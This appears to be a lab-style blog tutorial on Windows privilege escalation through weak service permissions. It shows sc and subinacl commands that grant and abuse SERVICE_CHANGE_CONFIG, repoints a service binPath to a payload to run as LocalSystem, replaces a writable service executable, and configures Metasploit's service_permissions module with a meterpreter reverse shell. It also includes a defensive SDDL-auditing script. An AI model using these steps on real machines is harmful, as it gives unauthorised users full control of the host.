Weak Service Permissions: Windows Privilege Escalation


A few words first

The official introduction:
https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications

Every service runs in the context of a system or user account. The following built-in accounts are the ones most services run as:
LocalService
NetworkService
LocalSystem

When a service is installed with CreateService, the SCM creates a security descriptor for the service object. The default security descriptor grants the following permissions:

[screenshot: default service security descriptor]

Practical use

Two kinds of insecure configuration are of interest:

1. Insecure service configuration permissions: a low-privileged user can change the service's settings, such as the path of the executable the service runs.

2. Insecure service executables: a low-privileged user can overwrite the executable the service runs with a program of their own, which the service then runs as its own account.

Insecure service configuration permissions (PTOC)

Create a new service for the lab as follows (sc.exe requires the space after binPath=):
sc create 3attack binPath= "C:\Users\Public\Documents\data\1.exe"

[screenshot]

Grant the low-privileged user y rights on the service with subinacl. In subinacl's service access letters, P = pause/continue, T = start, O = stop and C = change service configuration:

subinacl.exe /service 3attack  /grant=y=PTOC

[screenshot]

sc

Now, as the low-privileged user, query the service information with sc:

[screenshot]

Query the configuration of the target service 3attack: it runs as LocalSystem, and the user is allowed to start and stop it.

[screenshot]

accesschk64

Look for SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG granted to the current user or a group it belongs to; either right lets the user change the service configuration, including the binary path.

[screenshot]
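The default security descriptor shown earlier and the sc/accesschk checks above both come down to reading a service DACL. The script below is an added example (not the post author's code) that decodes the SDDL string `sc sdshow <service>` prints, lists what each trustee is allowed, flags untrusted trustees holding a takeover right such as SERVICE_CHANGE_CONFIG, and emits a hardened descriptor suitable for `sc sdset`. The two descriptors it runs on are constructed: the well-known default service descriptor, and the same service after `subinacl /service 3attack /grant=y=PTOC` (the SID for user y is made up).

```python
"""Decode the SDDL that `sc sdshow <service>` prints and flag principals that can
take the service over. Added example, not the post author's code; the descriptors
below are constructed (the SID for user y is made up)."""
import re

# Two-letter SDDL access-right codes as they apply to service objects
# (bit values from winsvc.h / winnt.h).
RIGHTS = {
    "CC": ("SERVICE_QUERY_CONFIG", 0x0001),
    "DC": ("SERVICE_CHANGE_CONFIG", 0x0002),
    "LC": ("SERVICE_QUERY_STATUS", 0x0004),
    "SW": ("SERVICE_ENUMERATE_DEPENDENTS", 0x0008),
    "RP": ("SERVICE_START", 0x0010),
    "WP": ("SERVICE_STOP", 0x0020),
    "DT": ("SERVICE_PAUSE_CONTINUE", 0x0040),
    "LO": ("SERVICE_INTERROGATE", 0x0080),
    "CR": ("SERVICE_USER_DEFINED_CONTROL", 0x0100),
    "SD": ("DELETE", 0x10000),
    "RC": ("READ_CONTROL", 0x20000),
    "WD": ("WRITE_DAC", 0x40000),
    "WO": ("WRITE_OWNER", 0x80000),
    "GA": ("GENERIC_ALL", 0x10000000),
    "GX": ("GENERIC_EXECUTE", 0x20000000),
    "GW": ("GENERIC_WRITE", 0x40000000),
    "GR": ("GENERIC_READ", 0x80000000),
}
# Well-known SID aliases seen in service DACLs.
SID_ALIASES = {"SY": "NT AUTHORITY\\SYSTEM", "BA": "BUILTIN\\Administrators",
               "BU": "BUILTIN\\Users", "IU": "NT AUTHORITY\\INTERACTIVE",
               "SU": "NT AUTHORITY\\SERVICE", "AU": "NT AUTHORITY\\Authenticated Users",
               "WD": "Everyone"}
# Rights that let a trustee replace the binary path or rewrite the DACL itself.
DANGEROUS = {"DC", "WD", "WO", "GA", "GW"}
TRUSTED = {"SY", "BA"}          # trustees that are expected to hold them

ACE_RE = re.compile(r"\(([^)]*)\)")
DACL_RE = re.compile(r"D:[A-Z]*(?:\([^)]*\))+")   # "D:" + optional flags + ACEs; stops before "S:"

def ordered_codes(field):
    """Split an ACE rights field into two-letter codes; a hex mask is accepted too."""
    if field.startswith("0x"):
        mask = int(field, 16)
        return [c for c, (_, bit) in RIGHTS.items() if mask & bit]
    return [field[i:i + 2] for i in range(0, len(field), 2)]

def dacl_aces(sddl):
    """Return (ace_type, rights_codes, trustee) for every ACE in the DACL."""
    m = DACL_RE.search(sddl)
    if not m:
        return []
    out = []
    for ace in ACE_RE.findall(m.group(0)):
        f = ace.split(";")               # type;flags;rights;object;inherit-object;trustee
        if len(f) >= 6:
            out.append((f[0], ordered_codes(f[2]), f[5]))
    return out

def describe(sddl):
    """Map each trustee to the sorted names of the rights it is allowed."""
    out = {}
    for ace_type, codes, trustee in dacl_aces(sddl):
        if ace_type == "A":              # only access-allowed ACEs grant anything
            name = SID_ALIASES.get(trustee, trustee)
            out.setdefault(name, set()).update(RIGHTS[c][0] for c in codes if c in RIGHTS)
    return {k: sorted(v) for k, v in out.items()}

def weak_trustees(sddl):
    """Untrusted trustees holding a right that lets them take the service over."""
    weak = {}
    for ace_type, codes, trustee in dacl_aces(sddl):
        if ace_type == "A" and trustee not in TRUSTED:
            bad = {RIGHTS[c][0] for c in codes if c in DANGEROUS}
            if bad:
                weak.setdefault(SID_ALIASES.get(trustee, trustee), set()).update(bad)
    return {k: sorted(v) for k, v in weak.items()}

def harden(sddl):
    """Strip the dangerous rights from untrusted trustees and return the SDDL,
    ready for `sc sdset <service> "<sddl>"`; start/stop/pause rights are kept."""
    def fix(m):
        f = m.group(1).split(";")
        if len(f) >= 6 and f[0] == "A" and f[5] not in TRUSTED:
            kept = [c for c in ordered_codes(f[2]) if c not in DANGEROUS]
            if not kept:
                return ""                # nothing left to grant: drop the ACE
            f[2] = "".join(kept)
        return "(" + ";".join(f) + ")"
    m = DACL_RE.search(sddl)
    return sddl[:m.start()] + ACE_RE.sub(fix, m.group(0)) + sddl[m.end():]

# Constructed input: the default descriptor the SCM gives a new service.
DEFAULT_SD = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
              "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
              "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
# Constructed: 3attack after `subinacl /service 3attack /grant=y=PTOC`, i.e. one extra
# ACE for user y with P=DT, T=RP, O=WP, C=DC. The SID is made up for the example.
USER_Y = "S-1-5-21-1111111111-2222222222-3333333333-1001"
WEAK_SD = DEFAULT_SD.replace("S:", "(A;;DCRPWPDT;;;" + USER_Y + ")S:")

if __name__ == "__main__":
    for label, sd in (("default", DEFAULT_SD), ("after PTOC grant", WEAK_SD)):
        print(label, "->", weak_trustees(sd) or "no weak trustees")
    print("hardened:", harden(WEAK_SD))
```

On a real host the input comes from `sc sdshow 3attack`; the default descriptor gives INTERACTIVE and SERVICE only query rights, while the PTOC grant adds DC (SERVICE_CHANGE_CONFIG) for user y, which is exactly what accesschk reports as SERVICE_CHANGE_CONFIG. The hardened output keeps start/stop/pause for y and removes only the right that allows the binary path to be rewritten; whether start/stop should stay is a policy decision for the service in question.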

Exploitation

Download the payload to the host

[screenshot]

Point the service at the payload and start it. Because the payload is not a real service binary and never reports to the SCM, sc start returns error 1053 after a timeout, but the executable has already been run as LocalSystem by then:
sc config 3attack binPath= "C:\Users\y\13340.exe"
sc start 3attack

[screenshot]

The resulting session has the following privileges:

[screenshot]

Insecure service executables (PTO)

Exploitation

Here the service configuration itself is not writable, but the executable it points to is. Download the payload, rename it to the name of the service's executable and overwrite the original. If the service is running, stop it first (the O right), otherwise the file is locked and cannot be replaced.

[screenshots]

Start the service; the payload calls back as follows:

[screenshot]

Direct exploitation with Metasploit

use exploit/windows/local/service_permissions

msf6 exploit(windows/local/service_permissions) > options

Module options (exploit/windows/local/service_permissions):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   AGGRESSIVE  false            no        Exploit as many services as possible (dangerous)
   SESSION     5                yes       The session to run this module on.
   TIMEOUT     10               yes       Timeout for WMI command in seconds


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.122.1    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

[screenshots of the module run]


Author: Yangsir
Reprint policy: unless otherwise stated, all articles on this blog are licensed under CC BY 4.0. If reproduced, please credit Yangsir as the source.